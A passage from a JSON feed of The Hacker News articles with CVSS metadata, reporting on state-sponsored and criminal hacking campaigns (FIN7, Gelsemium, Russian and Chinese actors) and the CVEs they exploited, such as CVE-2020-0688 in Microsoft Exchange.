data.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj72CV_TZddW8ZEFbbWJoksQeXFXLFFSgoy22sgxewm7OT-W5YDgBIqLdOhdUK4p3Z5AV32z7EtFYvCInbCCdVzX37Wzqx1TL_G6NeQuEKUOLVC6371dcORdcP2owx3pnjKJyUaGJCQ56o-mLZcUzXswT3hUvEKbXxZBzEmEt8nYAClgNN9xU4V4anK>)\n\nSome of the [vulnerabilities](<https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html>) leveraged by the attackers for initial access and privilege escalation are as follows \u2013\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) \u2013 FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) \u2013 Microsoft Exchange validation key remote code execution vulnerability\n * [**CVE-2020-17144**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17144>) (CVSS score: 8.4) \u2013 Microsoft Exchange remote code execution vulnerability\n\nMany of the intrusions also involve gaining a foothold to enterprise and cloud networks, with the adversaries maintaining persistent access to the compromised Microsoft 365 environments for as long as six months to repeatedly harvest emails and data.\n\n\"As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access,\" the agencies explained. \"This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\"\n\nAmong other malicious activities observed is the routine use of virtual private servers (VPSs) as an encrypted proxy and the use of legitimate credentials to exfiltrate emails from the victim's enterprise email system. The advisory, however, does not single out any Russian state actor by name.\n\n\"Over the last several years, Russian state-sponsored cyber actors have been persistent in targeting U.S. cleared defense contractors to get at sensitive information,\" [said](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2935170/nsa-fbi-cisa-release-advisory-on-protecting-cleared-defense-contractor-networks/>) Rob Joyce, director of NSA Cybersecurity. \"Armed with insights like these, we can better detect and defend important assets together.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T05:42:00", "type": "thn", "title": "U.S. Says Russian Hackers Stealing Sensitive Data from Defense Contractors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-17T13:01:50", "id": "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "href": "https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-12-26T12:10:08", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgu9YKd02vdFX9q7nH_mj_COAplqIClED8G3-bIqGZfD9uEAVx2YkW4pnR4oTHEKnrj9qtpM11W6mYLnGXvGxEt9IFdVd2PCh0jnop8BOe_IT_acIv-VKs3Q-JjeXkZPvJplINEolBZljwID-Ev26al_uOtbkyFHFd7atp9dyswl66CcZIVuWykjyr6wg/s728-rj-e365/cyber.png>)\n\nAn exhaustive analysis of **FIN7** has unmasked the cybercrime syndicate's organizational hierarchy, alongside unraveling its role as an affiliate for mounting ransomware attacks.\n\nIt has also exposed deeper associations between the group and the larger threat ecosystem comprising the now-defunct ransomware [DarkSide](<https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html>), [REvil](<https://thehackernews.com/2022/05/new-revil-samples-indicate-ransomware.html>), and [LockBit](<https://thehackernews.com/2022/11/amadey-bot-spotted-deploying-lockbit-30.html>) families.\n\nThe highly active threat group, also known as Carbanak, is [known](<https://thehackernews.com/2022/04/fin7-hackers-leveraging-password-reuse.html>) for employing an extensive arsenal of tools and tactics to expand its \"cybercrime horizons,\" including adding ransomware to its playbook and setting up fake security companies to lure researchers into conducting ransomware attacks under the guise of penetration testing.\n\nMore than 8,147 victims have been compromised by the financially motivated adversary across the world, with a majority of the entities located in the U.S. Other prominent countries include China, Germany, Canada, Italy, and the U.K.\n\nFIN7's intrusion techniques, over the years, have further diversified beyond traditional social engineering to include infected USB drives, software supply chain compromise, and the use of stolen credentials purchased from underground markets.\n\n\"Nowadays, its initial approach is to carefully pick high-value companies from the pool of already compromised enterprise systems and force them to pay large ransoms to restore their data or seek unique ways to monetize the data and remote access,\" PRODAFT [said](<https://www.prodaft.com/resource/detail/fin7-unveiled-deep-dive-notorious-cybercrime-gang>) in a report shared with The Hacker News.\n\nAccording to the Swiss cybersecurity company, the Russian-speaking hacking crew has also been observed to weaponize several flaws in Microsoft Exchange such as [CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>), [CVE-2021-42321](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>), [ProxyLogon, and ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>) to obtain a foothold into target environments.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhXWJSj-lP5zgkimydTc-CwuBckZJpMoZ8KlEOqjTK1s14n8Ry6x7NcJHE6iuaC2p2llH7aphAnF9AGSkY-IMY3ofTAKq1rATS5XB5z-Fnxh6v2Lr3_wmyfCwBsAALRjmoyzwRDHWnMfGyS3UC_ftVWp1CnJeC09vF4HmeUbM2J0Y7BwIeouLTThKTe/s728-rj-e365/fin7.png>)\n\nThe use of [double extortion tactics](<https://thehackernews.com/2022/12/cuba-ransomware-extorted-over-60.html>) notwithstanding, attacks mounted by the group have deployed SSH backdoors on the compromised systems, even in scenarios where the victim has already paid a ransom.\n\nThe idea is to resell access to other ransomware outfits and re-target the victims as part of its illicit money-making scheme, underscoring its attempts to minimize efforts and maximize profits, not to mention prioritize companies based on their annual revenues, founded dates, and the number of employees.\n\nThis \"demonstrates a particular type of feasibility study considered a unique behavior among cybercrime groups,\" the researchers said.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1L6lSPfanTW7NwX9INlkaghoZj0MyjyyCHu7VJ2WOAB0-a8ipVazPaPiLkSPVkIBBeBrgcnwVzrKGh7hIH0N52sNHSgp7Vbg9K4Rqm_6NIALFtTqkkLtv6AkE8lDtTL7ZEb5WVXABPi3XMY0clFfTSBtJq_7t66O_imTe8dVlT7-vL0MHcB3e1LBL/s728-rj-e365/data.png>)\n\nPut differently, the modus operandi of FIN7 boils down to this: It utilizes services like Crunchbase, Dun &amp; Bradstreet (DNB), Owler, and Zoominfo to shortlist firms and organizations with the highest revenue. It also uses other website analytics platforms like MuStat and Similarweb to monitor traffic to the victims' sites.\n\nInitial access is then obtained through one of the many intrusion vectors, followed by exfiltrating data, encrypting files, and eventually determining the ransom amount based on the company's revenue.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhQwT6VXETxCd7gYcc7Yd03MnZ7nA_L948mXUJkAgn4SOwbIKEi30eZGf2YXgDN1QA6ak7etSe1368r_b5rgcDyV09jIQcKz5GDMmpp_UKs4886x6Kuq9llZuCFuz8reUq22aBAZ38FrxOOFeTSJLmECsaMukFx9rTLqxuCz3Zl5ijc2Cr1ucglgif1/s728-rj-e365/map.png>)\n\nThese infection sequences are also designed to load remote access trojans such as [Carbanak](<https://thehackernews.com/2021/06/fin7-supervisor-gets-7-year-jail-term.html>), [Lizar](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>) (aka Tirion), and [IceBot](<https://www.recordedfuture.com/fin7-flash-drives-spread-remote-access-trojan>), the latter of which was first documented by Recorded Future-owned Gemini Advisory in January 2022.\n\nOther tools developed and delivered by FIN7 encompass a module dubbed Checkmarks that's orchestrated to automate mass scans for vulnerable Microsoft Exchange servers and other public-facing web applications as well as [Cobalt Strike](<https://thehackernews.com/2022/11/google-identifies-34-cracked-versions.html>) for post-exploitation.\n\nIn yet another indication that criminal groups [function like traditional companies](<https://thehackernews.com/2022/04/researchers-share-in-depth-analysis-of.html>), FIN7 follows a team structure consisting of top-level management, developers, pentesters, affiliates, and marketing teams, each of whom are tasked with individual responsibilities.\n\nWhile two members named Alex and Rash are the chief players behind the operation, a third managerial member named Sergey-Oleg is responsible for delegating duties to the group's other associates and overseeing their execution.\n\nHowever, an examination of the group's Jabber conversation history has revealed that operators in administrator positions engage in coercion and blackmail to intimidate team members into working more and issue ultimatums to \"hurt their family members in case of resigning or escaping from responsibilities.\"\n\nThe findings come more than a month after cybersecurity company SentinelOne [identified](<https://thehackernews.com/2022/11/researchers-find-links-bw-black-basta.html>) potential links between FIN7 and the Black Basta ransomware operation.\n\n\"FIN7 has established itself as an extraordinarily versatile and well-known APT group that targets enterprise companies,\" PRODAFT concluded. \"Their signature move is to thoroughly research the companies based on their revenue, employee count, headquarters and website information to pinpoint the most profitable targets.\"\n\n\"Although they have internal issues related to the unequal distribution of obtained monetary resources and somewhat questionable practices towards their members, they have managed to establish a strong presence in the cybercrime sphere.\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-22T13:13:00", "type": "thn", "title": "FIN7 Cybercrime Syndicate Emerges as a Major Player in Ransomware Landscape", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2021-42321"], "modified": "2022-12-26T11:59:04", "id": "THN:CE51F3F4A94EFC268FD06200BF55BECD", "href": "https://thehackernews.com/2022/12/fin7-cybercrime-syndicate-emerges-as.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[](<https://thehackernews.com/images/-2P9JF1_9yIc/YMdax55TYnI/AAAAAAAAC2o/YR05yeE9O-8JHf9oekreAzoMGSYXbsdlwCLcBGAsYHQ/s0/suppply-chain-cyberattack.jpg>)\n\nA new cyber espionage group named Gelsemium has been linked to a [supply chain attack targeting the NoxPlayer](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) Android emulator that was disclosed earlier this year.\n\nThe findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename [Operation TooHash](<https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf>) based on malware payloads deployed in those intrusions.\n\n\"Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,\" cybersecurity firm ESET [said](<https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/>) in an analysis published last week.\n\n\"Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand.\"\n\nTargeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi Arabia, Syria, and Egypt.\n\nSince its origins in the mid-2010s, Gelsemium has been found employing a variety of malware delivery techniques ranging from spear-phishing documents exploiting Microsoft Office vulnerabilities ([CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>)) and watering holes to a remote code execution flaw in Microsoft Exchange Server \u2014 likely [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>), which was addressed by the Windows maker in [June 2020](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) \u2014 to deploy the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell.\n\n[](<https://thehackernews.com/images/-erpEkE7yQsA/YMdYTWXAq3I/AAAAAAAAC2g/aFWtWeFaNBkcFx5QqUn08XgGEREESzmBQCLcBGAsYHQ/s0/malware.jpg>)\n\nAccording to ESET, Gelsemium's first stage is a C++ dropper named \"Gelsemine,\" which deploys a loader \"Gelsenicine\" onto the target system, which, in turn, retrieves and executes the main malware \"**Gelsevirine**\" that's capable of loading additional plug-ins provided by the command-and-control (C2) server.\n\nThe adversary is said to have been behind a supply chain attack aimed at BigNox's NoxPlayer, in a campaign dubbed \"**Operation NightScout**,\" in which the software's update mechanism was compromised to install backdoors such as **Gh0st RAT** and **PoisonIvy RAT** to spy on its victims, capture keystrokes, and gather valuable information.\n\n\"Victims originally compromised by that supply chain attack were later being compromised by Gelsemine,\" ESET researchers Thomas Dupuy and Matthieu Faou noted, with similarities observed between the trojanized versions of NoxPlayer and Gelsemium malware.\n\nWhat's more, another backdoor called **Chrommme**, which was detected on an unnamed organization's machine also compromised by the Gelsemium group, used the same C2 server as that of Gelsevirine, raising the possibility that the threat actor may be sharing the attack infrastructure across its malware toolset.\n\n\"The Gelsemium biome is very interesting: it shows few victims (according to our telemetry) with a vast number of adaptable components,\" the researchers concluded. \"The plug-in system shows that developers have deep C++ knowledge.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T13:34:00", "type": "thn", "title": "NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2020-0688"], "modified": "2021-06-14T13:34:33", "id": "THN:9B536B531E6948881A29BEC793495D1E", "href": "https://thehackernews.com/2021/06/noxplayer-supply-chain-attack-is-likely.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting 